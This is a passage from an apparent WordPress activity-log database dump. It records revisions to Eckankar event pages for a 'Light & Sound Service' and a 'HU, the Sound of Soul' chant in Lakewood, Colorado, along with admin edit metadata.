Can I Listen to Divine Guidance?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\r\n</li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243302,41224,'post_prev_post_status','draft'),(243303,41224,'post_new_post_status','publish'),(243304,41224,'post_prev_post_date','2023-11-21 09:40:07'),(243305,41224,'post_new_post_date','2023-11-21 09:40:16'),(243306,41224,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(243307,41224,'post_new_post_date_gmt','2023-11-21 16:40:16'),(243308,41224,'_message_key','post_updated'),(243309,41224,'_user_id','15'),(243310,41224,'_user_login','john-admin-96'),(243311,41224,'_user_email','nadazipought@zilch.org'),(243312,41224,'_server_remote_addr','184.96.219.x'),(243313,41224,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269412&action=edit'),(243314,41225,'post_id','269416'),(243315,41225,'post_type','mec-events'),(243316,41225,'post_title','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(243317,41225,'_message_key','post_updated'),(243318,41225,'_user_id','15'),(243319,41225,'_user_login','john-admin-96'),(243320,41225,'_user_email','nadazipought@zilch.org'),(243321,41225,'_server_remote_addr','184.96.219.x'),(243322,41225,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template+sound&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=ccef69b381&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(243323,41226,'new_post_title','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(243324,41226,'new_post_id','269416'),(243325,41226,'duplicated_post_title','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(243326,41226,'duplicated_post_id','266827'),(243327,41226,'_message_key','post_duplicated'),(243328,41226,'_user_id','15'),(243329,41226,'_user_login','john-admin-96'),(243330,41226,'_user_email','nadazipought@zilch.org'),(243331,41226,'_server_remote_addr','184.96.219.x'),(243332,41226,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template+sound&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=ccef69b381&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(243333,41227,'post_id','269416'),(243334,41227,'post_type','mec-events'),(243335,41227,'post_title','Opening Your Heart to Divine Love'),(243336,41227,'post_meta_added','79'),(243337,41227,'_message_key','post_updated'),(243338,41227,'_user_id','15'),(243339,41227,'_user_login','john-admin-96'),(243340,41227,'_user_email','nadazipought@zilch.org'),(243341,41227,'_server_remote_addr','184.96.219.x'),(243342,41227,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269416'),(243343,41228,'post_id','269416'),(243344,41228,'post_type','mec-events'),(243345,41228,'post_title','Opening Your Heart to Divine Love'),(243346,41228,'post_meta_added','79'),(243347,41228,'_message_key','post_updated'),(243348,41228,'_user_id','15'),(243349,41228,'_user_login','john-admin-96'),(243350,41228,'_user_email','nadazipought@zilch.org'),(243351,41228,'_server_remote_addr','184.96.219.x'),(243352,41228,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269416'),(243353,41229,'post_id','269416'),(243354,41229,'post_type','mec-events'),(243355,41229,'post_title','Opening Your Heart to Divine Love'),(243356,41229,'post_meta_added','79'),(243357,41229,'_message_key','post_updated'),(243358,41229,'_user_id','15'),(243359,41229,'_user_login','john-admin-96'),(243360,41229,'_user_email','nadazipought@zilch.org'),(243361,41229,'_server_remote_addr','184.96.219.x'),(243362,41229,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269416'),(243363,41230,'post_id','269416'),(243364,41230,'post_type','mec-events'),(243365,41230,'post_title','Opening Your Heart to Divine Love'),(243366,41230,'post_meta_added','79'),(243367,41230,'_message_key','post_updated'),(243368,41230,'_user_id','15'),(243369,41230,'_user_login','john-admin-96'),(243370,41230,'_user_email','nadazipought@zilch.org'),(243371,41230,'_server_remote_addr','184.96.219.x'),(243372,41230,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269416'),(243373,41231,'post_id','269416'),(243374,41231,'post_type','mec-events'),(243375,41231,'post_title','Opening Your Heart to Divine Love'),(243376,41231,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Experience HU, the Sound of Soul<br>\n</span></strong></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, an ancient mantra and divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/297480934/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(243215,41217,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\r\n</li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243216,41217,'post_prev_post_date','2023-11-21 09:33:08'),(243217,41217,'post_new_post_date','2023-11-21 09:35:57'),(243218,41217,'post_prev_thumb_id','266160'),(243219,41217,'post_prev_thumb_title','bird-sky-1'),(243220,41217,'post_new_thumb_id','269414'),(243221,41217,'post_new_thumb_title','Butterfly2'),(243222,41217,'_message_key','post_updated'),(243223,41217,'_user_id','15'),(243224,41217,'_user_login','john-admin-96'),(243225,41217,'_user_email','nadazipought@zilch.org'),(243226,41217,'_server_remote_addr','184.96.219.x'),(243227,41217,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269412'),(243228,41218,'post_id','269412'),(243229,41218,'post_type','mec-events'),(243230,41218,'post_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243231,41218,'post_prev_post_date','2023-11-21 09:35:57'),(243232,41218,'post_new_post_date','2023-11-21 09:36:04'),(243233,41218,'_message_key','post_updated'),(243234,41218,'_user_id','15'),(243235,41218,'_user_login','john-admin-96'),(243236,41218,'_user_email','nadazipought@zilch.org'),(243237,41218,'_server_remote_addr','184.96.219.x'),(243238,41218,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269412&action=edit'),(243239,41219,'post_id','269412'),(243240,41219,'post_type','mec-events'),(243241,41219,'post_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243242,41219,'post_new_thumb_id','269414'),(243243,41219,'post_new_thumb_title','Butterfly2'),(243244,41219,'post_meta_added','79'),(243245,41219,'_message_key','post_updated'),(243246,41219,'_user_id','15'),(243247,41219,'_user_login','john-admin-96'),(243248,41219,'_user_email','nadazipought@zilch.org'),(243249,41219,'_server_remote_addr','184.96.219.x'),(243250,41219,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269412&action=edit'),(243251,41220,'post_id','269412'),(243252,41220,'post_type','mec-events'),(243253,41220,'post_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243254,41220,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\n</li>\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\n</li>\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\n</li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\n<blockquote class=\"\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\n</blockquote>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(243255,41220,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\r\n</li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243256,41220,'post_prev_post_date','2023-11-21 09:37:47'),(243257,41220,'post_new_post_date','2023-11-21 09:38:04'),(243258,41220,'_message_key','post_updated'),(243259,41220,'_user_id','15'),(243260,41220,'_user_login','john-admin-96'),(243214,41217,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\n</li>\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\n</li>\n	<li>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\n</li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\n<blockquote class=\"\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\n</blockquote>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(243213,41217,'post_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243377,41231,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Experience HU, the Sound of Soul<br>\r\n</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, an ancient mantra and divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc 